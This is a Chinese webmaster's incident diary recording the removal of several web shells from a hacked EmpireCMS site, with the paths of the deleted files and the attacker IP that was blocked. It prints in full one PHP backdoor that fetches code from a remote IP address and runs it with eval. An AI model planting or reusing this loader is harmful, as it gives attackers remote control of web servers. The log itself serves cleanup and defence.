首页 > 其他 > 网站日记>正文

【战木马】查杀记录一

提示: 阅读权限:公开  

缘起:

2018.11.30   9点26分 

网友加好友求查杀。状态:新网站,首页定时被篡改,豆腐炒菠菜。

环境: 帝国cms7.5 utf8 nginx linux


所给权限:后台账号和密码,ftp账户和密码

查收过程:

9点 28分

登录后台,查看自定义页面,没有发现木马。但是修改自定义页面,有报错:.

9点31分  上传查杀工具

9点 38分  上传完成

https://。。。、/d/file/p/tuku/safe.func.php   删除

https://.../testdata/demopic/photo/dt/video.asf.php  删除

https://.../d/txt/jqplot.css.php   删除



这里有两个




10点37分 查杀 结束


合计 查杀  5个木马


由于现场被破坏,所以可能还有漏网之鱼。继续关注,等其暴露


23点  50分


https://。。。/e/DoPrint/noimage.php



删除了


https://。。。/e/enews/group_buy.php




https://。。。m/e/enews/aa.php  


这个厉害,从网络下载代码然后执行。 代码如下

<?php
function s(){
$contents = file_get_contents('http://23.252.161.21:8686/8group/a.jpg');
a($contents);
}
function a($conn){
$b = '';
eval($b.$conn.$b);
}
s();
//    
?>

0点 15 分 完毕

这次删除 三个

这次查杀后,网站首页仍然被修改,后发现有漏查木马,反复了两次。未能发现漏洞。

最后,在宝塔面板,屏蔽了ip地址:

23.252.161.21

才算消停。持续关注。



上一篇:帝国cms7.5+utf8 会员投稿成功后发送邮件给管理员

下一篇:【帝国cams插件】帝国小欧首页篡改专杀

tags: background

返回首页

相关

热门

站内直通车

[!--temp.bottomnav--]
返回顶部